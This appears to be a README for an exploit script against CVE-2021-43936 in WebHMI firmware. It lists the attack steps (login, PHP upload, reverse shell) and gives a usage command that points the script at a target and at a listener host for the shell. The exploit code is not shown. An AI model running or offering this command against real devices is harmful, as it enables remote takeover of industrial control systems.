CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.
This vulnerability works on versions 4.0 and the newest ones.
Tested only on 4.0.7475. Vulnerability is used by script in the following steps:
- Logs into the application
- Uploads the PHP code execution script
- Sends the reverse shell payload
Exploit can fail, if there are more than one NIC attached. The solution is to try once again.
python3 cve-2021-43936.py -t 10.100.23.200 -p 80 -l 10.100.23.201 -P 80